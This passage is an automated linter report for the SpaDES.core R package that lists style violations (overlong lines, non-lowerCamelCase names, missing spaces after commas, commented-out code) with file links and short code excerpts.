**Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but 